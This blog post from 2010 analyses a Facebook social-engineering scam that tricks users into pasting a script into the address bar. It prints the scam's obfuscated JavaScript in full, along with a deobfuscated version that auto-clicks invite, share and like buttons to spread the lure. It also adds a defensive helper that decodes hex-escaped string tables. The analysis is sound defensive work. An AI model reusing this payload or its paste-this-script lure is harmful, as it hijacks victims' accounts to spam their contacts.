May 2010 - Posts

It’s amazing how many people fall for scams and social engineering tricks on the internet. Some may remember the classic “I Love you” virus from back at the start of the century: it infected 50 million users within a week or two. It was actually a very amateurish virus except for one detail: social engineering. The mere name of the attachment was enough to entice people to open and execute the attached script. Fast forward ten years…

Ten years later, the year is 2010, computers are more commonplace, and one would generally expect people to be more computer savvy. Yet today on Facebook I saw that lots of people had clicked on and executed a script from a site claiming to have “The 9 Safest Ways to Have Unprotected Sex”. Over a quarter of a million Facebook users have fallen for this social engineering. This one is a bit benign, but it’s still social engineering that gets people to execute a script that otherwise wouldn’t be able to run.

The site gets people to copy text to the clipboard and then paste it into IE’s address bar. The text is:

BLOCKED SCRIPT(function(){a='app110142809028483_jop';b='app110142809028483_jode';ifc='app110142809028483_ifc'; ifo='app110142809028483_ifo';mw='app110142809028483_mwrapper';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](mw)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](ifo)[_0xa049[4]]=d[_0xa049[2]](ifc)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();

 

Which basically translates to:

BLOCKED SCRIPT(function(){
  // Element ids used by the page that hosts the lure
  a='app110142809028483_jop';
  b='app110142809028483_jode';
  ifc='app110142809028483_ifc';
  ifo='app110142809028483_ifo';
  mw='app110142809028483_mwrapper';
  d=document;
  // Hide the wrapper element and copy a form field's value into the page
  d["getElementById"](mw)["style"]["visibility"]="hidden";
  d["getElementById"](a)["innerHTML"]=d["getElementById"](b)["value"];
  // Click the element with id "suggest", then call fs.select_all() 5 seconds later
  d["getElementById"]("suggest")["click"]();
  setTimeout(function(){ fs["select_all"](); }, 5000);
  // After 5 seconds, submit the invite dialog and chain the remaining clicks
  setTimeout(function(){
    SocialGraphManager["submitDialog"]("sgm_invite_form","/ajax/social_graph/invite_dialog.php");
    setTimeout(function(){
      d["getElementById"]("slink")["click"]();
      setTimeout(function(){
        // Click every input whose value is "Share"
        inp=document["getElementsByTagName"]("input");
        for(i in inp){ if(inp[i]["value"]=="Share"){ inp[i]["click"](); } }
        setTimeout(function(){
          d["getElementById"]("likeme")["click"]();
          d["getElementById"](ifo)["innerHTML"]=d["getElementById"](ifc)["value"];
        }, 5000);
      }, 3000);
    }, 3000);
  }, 5000);
})();

The script uses timeouts to click on buttons, so the person ends up suggesting the page to other people, liking it, etc. without ever explicitly clicking on the submit buttons.
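
The translation above was done by hand; the same step can be done mechanically when triaging a pasted script. The following is an added example, not code from the original post: it decodes a `\xNN` string table, inlines the table references, and lists the elements the script clicks on its own. The sample input is a shortened, constructed excerpt in the same style, and the function names are illustrative.

```javascript
// Added example: statically resolve a hex-escaped string-table obfuscation.
// Nothing here evaluates the analysed script; it is only treated as text.

// Constructed sample modelled on the pasted script: three table entries and
// one statement that indexes into them.
const SAMPLE = String.raw`var _0xa049=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x69\x63\x6B","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[0]](_0xa049[2])[_0xa049[1]]();`;

// Turn \xNN escapes into the characters they encode.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Find `var _0x....=[...]`, decode it, and inline every NAME[i] reference.
function deobfuscate(src) {
  const decl = src.match(
    /var\s+(_0x[0-9a-f]+)\s*=\s*\[((?:\s*"(?:[^"\\]|\\.)*"\s*,?)*)\s*\]\s*;/i);
  if (!decl) return { table: [], code: src };   // pattern not present
  const table = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g;
  for (const m of decl[2].matchAll(literal)) table.push(decodeHexEscapes(m[1]));
  const ref = new RegExp(decl[1] + "\\[(\\d+)\\]", "g");
  const code = src.replace(decl[0], "").replace(ref, (whole, i) =>
    Number(i) < table.length ? JSON.stringify(table[Number(i)]) : whole);
  return { table, code };
}

// List element ids whose click() is invoked by the script itself, i.e. the
// actions taken on the user's behalf.
function listSyntheticClicks(code) {
  const call = /\["getElementById"\]\("([^"]+)"\)\["click"\]\(\)/g;
  return [...code.matchAll(call)].map((m) => m[1]);
}

const result = deobfuscate(SAMPLE);
console.log(result.table);
console.log(result.code);
console.log(listSyntheticClicks(result.code));
```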

It’s classic social engineering, and people still fall for it. Oh wait … it’s Facebook ;)
